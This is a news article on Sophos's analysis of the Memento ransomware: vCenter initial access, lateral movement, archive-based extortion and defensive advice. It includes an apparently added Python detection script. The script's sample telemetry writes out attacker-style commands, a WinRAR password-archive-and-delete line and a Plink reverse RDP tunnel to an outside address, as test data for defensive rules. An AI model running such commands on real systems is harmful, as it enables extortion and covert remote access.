Sophos researchers have discovered a new ransomware: Memento


The Memento ransomware locks files inside a password-protected archive to get around
anti-ransomware (encryption) protection, and demands a ransom of 1 million dollars in Bitcoin.

Sophos, a global leader in next-generation cybersecurity, has published details of how Memento, a new ransomware written in Python, operates.

In the new research "New Ransomware Actor Uses Password Protected Archives to Bypass Encryption Protection", Sophos describes the characteristics of this attack, in which the operators placed the target files inside a password-protected archive after their attempt to encrypt the data had been blocked.

"Human-operated ransomware attacks in the real world are rarely clear-cut and well defined," said Sean Gallagher, senior threat researcher at Sophos. "Cybercriminals take advantage of opportunities as they arise, adapting and changing their attack tactics and procedures on the fly. If they manage to get into a victim's network, they certainly are not willing to leave empty-handed. The Memento attack is a good example of this, and serves as a reminder to adopt security solutions that provide defence in depth. Being able to detect the presence of ransomware and attempts at encryption is essential, but it is equally important to have security technologies that can alert IT managers to other unexpected activity, such as lateral movement."

History of the attack

Sophos researchers believe that the Memento operators first got into the target network in mid-April 2021. To do so, they exploited a vulnerability in an Internet-facing VMware vSphere installation, a virtualization and cloud computing platform, which let them get onto a server. Forensic evidence found by the Sophos researchers indicates that the attackers began the main intrusion at the beginning of May 2021.

The attackers spent the first months on reconnaissance and lateral movement, using Remote Desktop Protocol (RDP), the NMAP network scanner, Advanced Port Scanner, and the Plink Secure Shell (SSH) tunnelling tool to set up an interactive connection to the compromised server. They also used mimikatz to harvest account credentials for use in later stages of the attack.

According to the Sophos researchers, on 20 October 2021 the attackers then used a legitimate tool, WinRAR, to compress a series of files, which they exfiltrated via RDP.

Deployment of the ransomware

The ransomware was deployed on 23 October 2021. The Sophos researchers found that the attackers initially tried to encrypt the files, but the security measures in place blocked the attempt. The cybercriminals then changed tactics, modifying and re-deploying the ransomware: they copied the unencrypted files into password-protected archives using a free version of WinRAR, encrypted the archive password, and deleted the original files.

They then demanded a ransom of $1 million in Bitcoin to restore the files. Fortunately, the company that was hit was able to recover its data without having to deal with the attackers.

Initial access via vCenter

The ransomware operators exploited a vulnerability (CVE-2021-21972) in the vSphere Client of VMware vCenter Server for initial access to victims' networks. The issue is an unauthenticated remote code execution vulnerability rated 9.8 on the CVSS scale. Exploiting it allows any attacker with network access to TCP port 443 on an exposed vCenter Server to execute commands on the underlying operating system with administrator-level privileges.

A patch for this vulnerability was released in February 2021, but many companies have not patched their systems.

The Memento operators launched their attacks last month by exploiting the vCenter vulnerability to steal administrative credentials, establishing persistence through scheduled tasks, and then using RDP over SSH to move through the network. After the reconnaissance phase, the attackers used WinRAR to create an archive of stolen files and exfiltrated it. Finally, they used Jetico's BCWipe data-wiping utility to remove the traces they had left behind, and then used a Python-based ransomware variant for AES encryption.
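The tool chain described above (WinRAR building password-protected archives and deleting the originals, Plink tunnels carrying RDP, BCWipe run before the ransomware) is visible in process-creation telemetry, which is the kind of "other unexpected activity" Gallagher refers to. The following is an added example written for this article, not Sophos's code and not anything from the Memento toolkit: it runs a few rules over constructed process-creation events with fields modelled on Sysmon Event ID 1 (timestamp, host, user, image path, command line). The rule names and every host name, user, path and password in the sample events are invented for the example; the WinRAR switches `a`, `-p`, `-hp` and `-df` and the Plink switches `-R`/`-L` are real.

```python
"""Added example: flag Memento-style tool use in process-creation telemetry.

Not Sophos's code. Events are constructed below with fields modelled on
Sysmon Event ID 1 (process creation); every host, user, path and password
in them is invented for the example.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

# Keep double-quoted paths as one token and drop the quotes; shlex in POSIX
# mode would swallow the backslashes in Windows paths.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmd: str) -> List[str]:
    """Split a Windows command line into argv-style tokens."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmd)]


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_archiver(argv: List[str]) -> Optional[str]:
    """WinRAR/rar 'a' (add) with -p<pwd> or -hp<pwd> (encrypt file data, or
    data and headers) is the archive-instead-of-encrypt pattern; -df (delete
    files after archiving) mirrors the deletion of the originals."""
    if len(argv) < 2 or argv[1].lower() != "a":
        return None
    switches = [t.lower() for t in argv[2:] if t.startswith("-")]
    if not any(s.startswith(("-p", "-hp")) for s in switches):
        return None
    detail = "password-protected archive created"
    if any(s.startswith("-hp") for s in switches):
        detail += " with encrypted headers (file names hidden)"
    if "-df" in switches:
        detail += "; source files deleted after archiving (-df)"
    return detail


def check_plink(argv: List[str]) -> Optional[str]:
    """Plink -R (reverse) or -L (local) port forwarding; a forwarded port
    3389 means RDP is being carried over the SSH tunnel."""
    for i, tok in enumerate(argv):
        if tok in ("-R", "-L") and i + 1 < len(argv):
            spec = argv[i + 1]
            kind = "reverse" if tok == "-R" else "local"
            rdp = " carrying RDP (3389)" if "3389" in spec.split(":") else ""
            return f"{kind} SSH tunnel {spec}{rdp}"
    return None


def check_wiper(argv: List[str]) -> Optional[str]:
    """Any BCWipe execution on a server is worth an analyst's attention."""
    return "Jetico BCWipe executed"


# Hypothetical rule names (not Sophos's), keyed on the image file name.
RULES: Dict[str, Tuple[str, Callable[[List[str]], Optional[str]]]] = {
    "rar.exe": ("memento_archive_as_encryption", check_archiver),
    "winrar.exe": ("memento_archive_as_encryption", check_archiver),
    "plink.exe": ("ssh_tunnel", check_plink),
    "bcwipe.exe": ("anti_forensic_wiper", check_wiper),
}


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per event whose image and command line match a rule."""
    findings = []
    for ev in events:
        rule = RULES.get(_basename(ev["image"]))
        if rule is None:
            continue
        name, check = rule
        detail = check(split_cmdline(ev["cmd"]))
        if detail is not None:
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "rule": name, "detail": detail})
    return findings


# Constructed sample telemetry: two malicious-looking WinRAR/Plink events, a
# BCWipe run, and two benign events that must not fire.
SAMPLE_EVENTS = [
    {"ts": "2021-10-23T02:14:11Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": "C:\\Users\\Public\\WinRAR.exe",
     "cmd": '"C:\\Users\\Public\\WinRAR.exe" a -hpTr0ub4dor -df -r D:\\share\\finance.rar D:\\share\\finance\\'},
    {"ts": "2021-10-20T23:41:05Z", "host": "VC01", "user": "CORP\\svc_backup",
     "image": "C:\\Users\\Public\\plink.exe",
     "cmd": "plink.exe -ssh -N -R 3389:127.0.0.1:3389 -P 443 -pw Tr0ub4dor ops@203.0.113.10"},
    {"ts": "2021-10-21T09:02:33Z", "host": "WS-ALICE", "user": "CORP\\alice",
     "image": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "cmd": '"C:\\Program Files\\WinRAR\\WinRAR.exe" a -r C:\\Users\\alice\\backup.rar C:\\Users\\alice\\Documents'},
    {"ts": "2021-10-21T09:02:40Z", "host": "WS-ALICE", "user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\svchost.exe",
     "cmd": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"},
    {"ts": "2021-10-23T02:30:57Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": "C:\\Users\\Public\\BCWipe.exe",
     "cmd": '"C:\\Users\\Public\\BCWipe.exe"'},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} {f['user']} [{f['rule']}] {f['detail']}")
```

The archiver rule keys on the combination of the `a` command and a password switch rather than on WinRAR itself, so routine backups (the third sample event) stay quiet while an archive built with `-hp` and `-df` from a user-writable path by a service account is surfaced with the evidence an analyst needs. In a real deployment the image check should also cover renamed binaries (the Memento operators used a renamed WinRAR), for example by matching on the file's original name or hash from the telemetry rather than on the path alone.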

Open entry points attracted more attackers

While the Memento operators were inside the affected network, other cybercriminals got in through the same vulnerability using similar exploits. Each of them installed cryptocurrency-mining software on the same compromised server. One attacker installed an XMR cryptominer on 18 May, while another installed an XMRig cryptominer on 8 September and again on 3 October.

"We see this all the time: when an Internet-facing vulnerability becomes public and is not neutralized with the appropriate patches, many attackers rush to take advantage of it. The longer you wait to mitigate it, the more attackers it will attract," said Gallagher. "Cybercriminals are constantly scanning the Internet for vulnerable entry points, and they certainly don't wait in line when they find one. Being breached by multiple attackers multiplies the damage and the recovery time for victims, and it also makes it harder for investigators to clarify and understand who did what, which is important information for those who deal with these threats and help companies avoid further attacks of the same kind."

Security tips

Sophos believes that this incident, in which several cybercriminals compromised the same unpatched Internet-facing server, underscores the importance of applying patches promptly and of checking the security of the software integrators, contract developers, and service providers you work with.

Sophos also recommends the following general best practices to help defend against ransomware and related cyberattacks:

At the strategic level

  • Deploy layered security. As ransomware attacks increasingly turn into extortion, backups remain necessary but are no longer sufficient. It is more important than ever to keep adversaries out, or to catch them quickly before they can do damage. Layered security blocks and detects attackers at as many points as possible within an environment
  • Combine human experts with anti-ransomware technology. The key to stopping ransomware is defence in depth that combines dedicated anti-ransomware technology with threat hunting carried out by experts. Technology provides the scale and automation a company needs, while human experts are better suited to spotting the tactics, techniques and procedures that signal an attacker's presence within the environment. A company that lacks this expertise in-house can call on cybersecurity specialists for assistance

At the day-to-day tactical level

  • Monitor and respond to alerts. Make sure the tools, processes, and resources (people) are available to monitor, investigate, and respond to threats found in the environment. Attackers often launch their attacks outside working hours, at weekends, or during public holidays, on the assumption that hardly anyone is watching
  • Define and enforce strong passwords. Strong passwords are one of the first lines of defence. Passwords should be complex or purpose-generated, and never reused. A password manager that stores staff credentials makes this easier
  • Use multi-factor authentication (MFA). Even strong passwords can be broken. Any form of multi-factor authentication is better than none for protecting access to critical resources such as e-mail, remote management tools, and network assets
  • Lock down accessible services. Perform network scans from the outside to identify and close the ports commonly used by VNC, RDP, or other remote access tools. If a machine must be reachable through a remote management tool, make sure that tool sits behind a VPN or a zero-trust network access solution that requires MFA as part of the login procedure
  • Use segmentation and zero trust. Separate critical servers from one another and from workstations by placing them in separate VLANs, and move towards a zero-trust network model
  • Make offline backups of information and applications. Keep backups up to date, make sure they can be restored, and keep a copy offline
  • Inventory assets and accounts. Unknown, unprotected, or unpatched devices on the network increase risk and create situations in which malicious activity can go undetected. It is essential to have an up-to-date inventory of everything that is connected. Use network scans, IaaS tools, and physical inspections to locate and categorize devices, and install endpoint protection software on any unprotected machine
  • Make sure security products are configured correctly. Systems and devices that are only partially protected are themselves vulnerable. It is important to ensure that security solutions are configured properly, and to check and, where necessary, validate and regularly update security policies. Security features in new deployments are not always enabled automatically. Do not disable tamper protection or create broad exclusions from checks, as this makes the attackers' job easier
  • Audit Active Directory (AD). Perform regular audits of all AD accounts, making sure none of them has more access than it actually needs. Disable departing employees' accounts as soon as they leave the company
  • Patch everything. Keep Windows and all other operating systems and software up to date. This also means verifying that patches were installed correctly and are in place on critical systems such as domain controllers and Internet-facing machines
